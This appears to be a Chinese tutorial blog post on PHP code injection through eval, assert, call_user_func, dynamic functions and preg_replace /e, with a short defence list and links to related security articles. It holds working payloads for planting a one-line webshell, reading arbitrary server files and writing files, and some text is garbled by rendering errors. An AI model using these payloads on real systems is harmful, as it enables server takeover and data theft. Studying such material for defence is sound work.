php命令注入

最新推荐文章于 2023-08-19 23:22:20 发布
最新推荐文章于 2023-08-19 23:22:20 发布
阅读量623 收藏
点赞数
分类专栏: php 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/115801148
版权
eval()
<?php

if(isset($_REQUEST['code'])){
@$str=$_REQUEST['code'];

eval($str);

}

?>

<?php

if(isset($_GET['code'])){
@$str=$_GET['code'];

eval($str);

}

?>

提交变量[?code=phpinfo();]

我们提交以下参数也是可以的

[?code=${phpinfo()};]

[?code=1;phpinfo();]

assert()
<?php

if(isset($_GET['code'])){
@$str=$_GET['code'];

assert($str);

}

?>

提交参数 [?code=phpinfo()]

call_user_func()
<?php

if(isset($_GET['fun'])){
$fun=$_GET['fun'];

$para=$_GET['para'];

call_user_func($fun,$para);

}

?>

提交参数[?fun=assert&para=phpinfo()]

动态函数 a ( a( a(b)
<?php

if(isset($_GET['a'])){
$a=$_GET['a'];

$b=$_GET['b'];

$a($b);

}

?>

[?a=assert$b=phpinfo()]

preg_replace()

mixed preg_replace(mixed $pattern,mixed $replacement,mixed KaTeX parse error: Expected 'EOF', got '&' at position 30: …imit = -1[,int &̲count]])

这段代码的含义是搜索 s u b j e c t 中 匹 配 subject 中匹配 subjectpattern 的部分,以 r e p l a c e m e n t 进 行 替 换 , 而 replacement 进行替换,而 replacementpattern处,及第一个参数存在e 修饰时,$replacement 的值会被当成PHP 代码来执行。典型的代码如下

<?php

if(isset($_GET['code'])){
@$str=$_GET['code'];

preg_replace("/
[(.∗)]
/e",'\\1',$code);

}

?>

匹配 c o d e code code中的数据并执行’ '\\1’表示正则第一次匹配的内容

提交参数[?code=[phpinfo()]], phpinfo() 会被执行

以上漏洞利用
获取shell

提交参数[?code=@eval($_REQUEST[1])],即可构成一句话木马,密码为[1]。可以使用菜刀连接

获取当前文件的绝对路径

FILE 是PHP 预定义常量,其含义为当前文件的路径。提交代码[?code=print(FILE);]

读文件

我们可以利用file_get_contents() 函数读取服务器任意文件,前提是知道文件的绝对路径(也可是相对路径)和读取权限

[?code=var_dump(file_get_contents(‘c:\windows\system32\drivers\etc\hosts’));]

写文件

我们可以利用file_put_contents() 函数写入文件,前提是知道可写文件目录。

提交代码[?code=var_dump(file_put_contents( P O S T [ 1 ] , _POST[1], POST[1],_POST[2]));]

此时需要借助与hackbar 通过post 方式提交参数

1=shel.php&2=<?php phpinfo()?>

防御方法

1、尽量不要使用eval(不是函数,是语言结构) 等函数

2、如果使用的话一定要进行严格的过滤

3、preg_replace 放弃使用/e 修饰符

4、修改配置文件

disable_functions=assert

道长在此
关注
专栏目录
详解php命令注入攻击
10-17
网络安全领域,PHP命令注入攻击是一种常见的攻击方式,攻击者通过构造特殊的输入数据,利用Web应用程序在执行命令时的安全漏洞,执行恶意的系统命令。这种攻击方式对服务器的安全构成了极大的威胁。 首先,我们要...
记一次命令执行漏洞的绕过姿势
qq_44060093的博客
04-11 2712
在一个CTF平台上发现了一个命令执行的题目 题目源代码如下: <?php if(isset($_REQUEST['ip'])) { $target = trim($_REQUEST['ip']); $substitutions = array( '&' =>'', ';' =>'', '|' =>'',...
i春秋网络内生安全试验场CTF夺旗赛(第四季)12月赛web write up题解
来到了学渣的博客
12-27 2305
题主也是个刚入门的小菜鸡,而且最近临近期末,无奈能力有限只能作出部分web题(未完待续…) 题目:nani 看源码有提示, 构造语句读取user.php http://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resource=user.php base64解码,得出源码 <?php ...
PHP代码注入详解
Zeker62的博客
08-16 5277
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP
php代码审计2之http头注入与crlf
划水的小白白
06-30 333
在URL跳转漏洞的地方不仅仅要试试SSRF,还要试试CRLF注入。本质是php的header函数在低版本存在http头注入,其危害主要取决于代码将获取到的请求头信息后续的操作,这种小tips在特殊时期也可以用来绕过一些限制,
DVWA通关教程(上)
热门推荐
qq_50854662的博客
05-22 1万+
简介: DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 登录创建数据库(账号为admin,密码为password) 登录后界面 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(暴力破解) Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。
命令注入讲解ppt.pptx
08-10
PHP 应用程序中也有名为 PHP 命令注入攻击的漏洞——国内著名的 Web 应用程序 Discuz! 、 DedeCMS 等都曾经存在过该类型漏洞。无论哪种形式,它们的攻击原理都是一样的。即当恶意黑客进入一个有命令注入漏洞的网页时...
Web攻防系列教程之浅析PHP命令注入攻击
05-27
Web攻防系列教程之浅析PHP命令注入攻击
php代码审计之命令注入(3)
01-09
PHP编程中,命令注入是一种严重的安全漏洞,它允许攻击者通过输入恶意代码来执行操作系统级别的命令。本文将深入探讨几种常见的PHP函数,这些函数在处理用户输入时如果不小心,可能导致命令注入。以下是对相关PHP...
PHP代码审计--Challenge6
D-R0s1的博客
02-12 1238
题目代码 <?php if(isset($_REQUEST[ 'ip' ])) { $target = trim($_REQUEST[ 'ip' ]); $substitutions = array( '&' => '', ';' => '', '|' => '', '-' => '', '$' => '', '(' => '', ')' =&gt...
命令执行和代码执行漏洞详解
渗透测试研究中心
08-15 1055
###命令执行定义 直接调用操作系统命令: 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令(或者bash命令)至服务器程序,服务器程序通过syst...
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
weixin_33943347的博客
08-06 768
0x01 前言 最近在做代码审计的工作中遇到了一个难题,题目描述如下: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ die("Long."); } if(preg_ma...
不包含字母和数字的webshell
最新发布
m0_59049258的博客
08-19 490
当$ 和 _ 没有被限制时。
PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 8098
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
PHP代码注入PHP代码注入漏洞
cc
03-06 6219
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
RCE无参数构造
nobugnomoney的博客
05-24 1396
一、RCE无参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
php危险函数总结
我是齐潇啊
03-28 5498
php危险函数笔记总结以及实操结果
15-SQL堆叠注入
qq_56414082的博客
03-29 1904
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
ctfshow--web--命令执行
whisper921的博客
02-11 3180
web29 可以看到过滤了flag字样 但我们可以通过通配符绕过flag,比如用fla?来表示flag 先用?c=system('ls');来观察该目录下存在的文件,发现了flag.php 然后使用?c=system('cp fla?.php 1.txt');将flag.php的内容配对到1.txt中 然后访问1.txt即可得到flag 得到flag web30 发现新过滤了system以及php这两个关键字 我们此时可以通过反引号```来代替system,继...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值